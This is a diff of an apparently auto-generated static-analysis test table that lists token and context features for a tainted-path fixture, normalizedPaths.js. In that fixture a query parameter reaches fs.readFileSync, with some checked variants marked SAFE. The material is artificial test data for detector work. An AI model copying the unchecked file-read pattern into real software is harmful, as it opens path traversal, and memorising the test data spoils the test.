... nside") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:300:5:300:44 | isPathI ... nside") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:300:5:300:44 | isPathI ... nside") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:300:5:300:44 | isPathInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:300:5:300:44 | isPathInside | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:300:5:300:44 | isPathInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:300:20:300:26 | require | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:300:20:300:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:300:20:300:26 | require | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:300:20:300:44 | exceptional return of require ... nside") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:300:20:300:44 | exceptional return of require ... nside") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:300:20:300:44 | exceptional return of require ... nside") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:300:20:300:44 | require ... nside") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:300:20:300:44 | require ... nside") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:300:20:300:44 | require ... nside") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:300:28:300:43 | "is-path-inside" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/normalizedPaths.js:300:28:300:43 | "is-path-inside" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:300:28:300:43 | "is-path-inside" | calleeImports | | | autogenerated/TaintedPath/normalizedPaths.js:300:28:300:43 | "is-path-inside" | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:300:28:300:43 | "is-path-inside" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:300:28:300:43 | "is-path-inside" | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:301:5:301:16 | pathIsInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:301:5:301:16 | pathIsInside | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:301:5:301:16 | pathIsInside | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:301:5:301:16 | pathIsInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:301:5:301:44 | pathIsI ... nside") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:301:5:301:44 | pathIsI ... nside") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:301:5:301:44 | pathIsI ... nside") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:301:5:301:44 | pathIsInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:301:5:301:44 | pathIsInside | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:301:5:301:44 | pathIsInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:301:20:301:26 | require | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:301:20:301:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:301:20:301:26 | require | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:301:20:301:44 | exceptional return of require ... nside") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:301:20:301:44 | exceptional return of require ... nside") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:301:20:301:44 | exceptional return of require ... nside") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:301:20:301:44 | require ... nside") | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:301:20:301:44 | require ... nside") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:301:20:301:44 | require ... nside") | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:301:28:301:43 | "path-is-inside" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/normalizedPaths.js:301:28:301:43 | "path-is-inside" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:301:28:301:43 | "path-is-inside" | calleeImports | | | autogenerated/TaintedPath/normalizedPaths.js:301:28:301:43 | "path-is-inside" | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:301:28:301:43 | "path-is-inside" | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:301:28:301:43 | "path-is-inside" | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:302:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:302:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:302:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:302:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:302:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:302:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:336:2 | app.get ... \\n\\t}\\n\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:336:2 | app.get ... \\n\\t}\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:336:2 | app.get ... \\n\\t}\\n\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:336:2 | exceptional return of app.get ... \\n\\t}\\n\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:336:2 | exceptional return of app.get ... \\n\\t}\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:1:336:2 | exceptional return of app.get ... \\n\\t}\\n\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:5:302:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:5:302:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:5:302:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:302:9:302:32 | '/pseud ... ations' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:302:9:302:32 | '/pseud ... ations' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:302:9:302:32 | '/pseud ... ations' | calleeImports | express | @@ -9293,6 +77611,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:302:9:302:32 | '/pseud ... ations' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:302:9:302:32 | '/pseud ... ations' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:302:9:302:32 | '/pseud ... ations' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | isPathInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | isPathInside | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | isPathInside | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | isPathInside | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | isPathInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | pathIsInside | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | pathIsInside | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | pathIsInside | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | pathIsInside | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | pathIsInside | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | pathModule | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:302:34 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | (req, r ... \\n\\n\\t}\\n\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | (req, r ... \\n\\n\\t}\\n\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | (req, r ... \\n\\n\\t}\\n\\n} | calleeImports | express | @@ -9300,6 +77643,96 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | (req, r ... \\n\\n\\t}\\n\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | (req, r ... \\n\\n\\t}\\n\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | (req, r ... \\n\\n\\t}\\n\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | return of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:302:35:336:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:36:302:38 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:36:302:38 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:36:302:38 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:302:36:302:38 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:302:36:302:38 | req | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:302:36:302:38 | req | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:302:36:302:38 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:302:36:302:38 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:302:36:302:38 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:36:302:38 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:302:41:302:43 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:302:41:302:43 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:302:41:302:43 | res | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:302:41:302:43 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:302:41:302:43 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:9 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:9 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:9 | path | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:9 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:9 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:26 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:26 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:26 | path | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:26 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:26 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:26 | path = ... ry.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:26 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:26 | path = ... ry.path | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:26 | path = ... ry.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:303:6:303:26 | path = ... ry.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:15 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:15 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:15 | req | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:15 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:15 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:21 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:21 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:21 | req.query | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:21 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:21 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:26 | req.query.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:26 | req.query.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:26 | req.query.path | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:26 | req.query.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:303:13:303:26 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:303:17:303:21 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:303:17:303:21 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:303:17:303:21 | query | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:303:17:303:21 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:303:17:303:21 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:303:23:303:26 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:303:23:303:26 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:303:23:303:26 | path | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:303:23:303:26 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:303:23:303:26 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:3 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:3 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:3 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:3 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:16 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:16 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:16 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:16 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:22 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:22 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:22 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path fs readFileSync path isPathInside path SAFE fs readFileSync path fs readFileSync path pathIsInside path SAFE fs readFileSync path fs readFileSync path normalizedPath pathModule join SAFE path pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath pathIsInside normalizedPath SAFE fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:22 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:22 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:22 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:304:2:304:22 | fs.read ... c(path) | 